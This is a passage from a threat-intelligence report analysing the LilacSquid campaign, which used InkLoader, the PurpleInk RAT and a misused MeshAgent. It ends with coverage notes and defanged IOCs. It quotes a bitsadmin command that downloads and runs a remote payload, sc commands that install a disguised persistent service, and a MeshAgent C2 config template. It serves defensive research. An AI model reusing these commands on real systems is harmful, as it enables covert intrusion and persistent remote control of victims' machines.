bitsadmin /transfer -job\_name- /download /priority normal -remote\_URL- -local\_path\_for\_MeshAgent-  -local\_path\_for\_MeshAgent- connect 

**Instrumenting InkLoader – Modularizing the infection chain **

When compromised RDP credentials were used to gain access, the infection chain was altered slightly. LilacSquid chose to either deploy MeshAgent and subsequent implants, or introduce another component in the infection preceding PurpleInk.  

InkLoader is a simple, yet effective DOT NET-based malware loader. It is written to run a hardcoded executable or command. In this infection chain, InkLoader is the component that persists across reboots on the infected host instead of the actual malware it runs. So far, we have only seen PurpleInk being executed via InkLoader, but LilacSquid may likely use InkLoader to deploy additional malware implants. 

Talos observed LilacSquid deploy InkLoader in conjunction with PurpleInk only when they could successfully create and maintain remote sessions via remote desktop (RDP) by exploiting the use of stolen credentials to the target host. A successful login via RDP leads to the download of InkLoader and PurpleInk, copying these artifacts into desired directories on disk and the subsequent registration of InkLoader as a service that is then started to deploy InkLoader and, in turn, PurpleInk. The infection chain can be visualized as: 

Service creation and execution on the endpoint is typically done via the command line interface using the commands: 

sc create TransactExDetect displayname=Extended Transaction Detection binPath= \_filepath\_of\_InkLoader\_ start= auto 
sc description TransactExDetect Extended Transaction Detection for Active Directory domain hosts 
sc start TransactExDetect 

**PurpleInk – LilacSquid's bespoke implant **

PurpleInk, LilacSquid’s primary implant of choice, has been adapted from QuasarRAT, a popular remote access trojan family. Although QuasarRAT has been available to threat actors since at least 2014, we observed PurpleInk being actively developed starting in 2021 and continuing to evolve its functionalities separate from its parent malware family.  

PurpleInk uses an accompanying configuration file to obtain information such as the C2 server’s address and port. This file is typically base64-decoded and decrypted to obtain the configuration strings required by PurpleInk. 

PurpleInk is a highly versatile implant that is heavily obfuscated and contains a variety of RAT capabilities. Talos has observed multiple variants of PurpleInk where functionalities have both been introduced and removed. 

In terms of RAT capabilities, PurpleInk can perform the following actions on the infected host: 

*   Enumerate the process and send the process ID, name and associated Window Title to the C2. 
*   Terminate a process ID (PID) specified by the C2 on the infected host. 
*   Run a new application on the host – start process. 
*   Get drive information for the infected host, such as volume labels, root directory names, drive type and drive format. 
*   Enumerate a given directory to obtain underlying directory names, file names and file sizes. 
*   Read a file specified by the C2 and exfiltrate its contents. 
*   Replace or append content to a specified file. 

*   Gather system information about the infected host using WMI queries. Information includes:  

Information retrieved 

WMI query and output used 

Processor name 

SELECT \* FROM Win32\_Processor 

Memory (RAM) size in MB 

Select \* From Win32\_ComputerSystem | TotalPhysicalMemory 

Video Card (GPU) 

SELECT \* FROM Win32\_DisplayConfiguration | Description 

Username 

Current username 

Computer name 

Infected host’s name 

Domain name 

Domain of the infected host 

Host name 

NetBIOS Host name 

System drive 

Root system drive 

System directory 

System directory of the infected host 

Computer uptime 

Calculate uptime from current time and SELECT \* FROM Win32\_OperatingSystem WHERE Primary='true' | LastBootUpTime 

MAC address 

By enumerating Network interfaces on the endpoint 

LAN IP address 

By enumerating Network interfaces on the endpoint 

WAN IP address 

None – not retrieved or calculated – empty string sent to C2. 

Antivirus software name 

Not calculated – defaults to “NoInfo” 

Firewall 

Not calculated – defaults to “NoInfo” 

Time zone 

Not calculated – an empty string is sent to the C2. 

Country 

Not calculated – an empty string is sent to the C2. 

ISP 

Not calculated – an empty string is sent to the C2. 

*   Start a remote shell on the infected host using ‘ cmd\[.\]exe /K ’. 
*   Rename or move directories and files and then enumerate them. 
*   Delete files and directories specified by the C2. 
*   Connect to a specified remote address, specified by the C2. This remote address referenced as “Friend” internally is the reverse proxy host indicating that PurpleInk can act as an intermediate proxy tool. 

PurpleInk has the following capabilities related to communicating with its “friends” (proxy servers): 

*   Connect to a _new_ friend whose remote address is specified by the C2. 
*   Send data to a new or existing friend. 
*   Disconnect from a specified friend. 
*   Receive data from another connected friend and process it. 

Another PurpleInk variant, built and deployed in 2023 and 2024, consists of limited functionalities, with much of its capabilities stripped out. The capabilities that still reside in this variant are the abilities to: 

*   Close all connections to proxy servers. 
*   Create a reverse shell.  
*   Connect and send/receive data from connected proxies. 

Functionalities, such as file management, execution and gathering system information, have been stripped out of this variant of PurpleInk, but can be supplemented by the reverse shell carried over from previous variants, which can be used to carry out these tasks on the infected endpoint. Adversaries frequently strip, add and stitch together functionalities to reduce their implant’s footprint on the infected system to avoid detection or to improve their implementations to remove redundant capabilities.  

**InkBox – Custom loader observed in older attacks **

InkBox is a malware loader that will read from a hardcoded file path on disk and decrypt its contents. The decrypted content is another executable assembly that is then run by invoking its Entry Point within the InkBox process. This second assembly is the backdoor PurpleInk. The overall infection chain in this case is: 

The usage of InkBox to deploy PurpleInk is an older technique used by LilacSquid since 2021. Since 2023, the threat actor has produced another variant of the infection chain where they have modularized the infection chain so that PurpleInk can now run as a separate process. However, even in this new infection chain, PurpleInk is still run via another component that we call "InkLoader.”  

**LilacSquid employs MeshAgent **

In this campaign, LilacSquid has extensively used MeshAgent as the first stage of their post-compromise activity. MeshAgent is the agent/client from the MeshCentral, an open-source remote device management software. The MeshAgent binaries typically use a configuration file, known as an MSH file. The MSH files in this campaign contain information such as MeshName (victim identifier in this case) and C2 addresses: 

MeshName=-Name\_of\_mesh- 
MeshType=-Type\_of\_mesh- 
MeshID=0x-Mesh\_ID\_hex- 
ServerID=-Server\_ID\_hex- 
MeshServer=wss://-Mesh\_C2\_Address-
Translation=-keywords\_translation\_JSON-

Being a remote device management utility, MeshAgent allows an operator to control almost all aspects of the device via the MeshCentral server, providing capabilities such as: 

*   List all devices in the Mesh (list of victims). 
*   View and control desktop. 
*   Manage files on the system. 
*   View software and hardware information about the device.  

Post-exploitation, MeshAgent activates other dual-use and malicious tools on the infected systems, such as SSF and PurpleInk.  

**Coverage **

Ways our customers can detect and block this threat are listed below. 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.   

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protection with context to your specific environment and threat data are available from the Firewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

**IOCs**

IOCs for this research can also be found at our GitHub repository here. 

**PurpleInk **

2eb9c6722139e821c2fe8314b356880be70f3d19d8d2ba530adc9f466ffc67d8 

**Network IOCs **

67\[.\]213\[.\]221\[.\]6 

192\[.\]145\[.\]127\[.\]190 

45\[.\]9\[.\]251\[.\]14 

199\[.\]229\[.\]250\[.\]142

Tag

#ios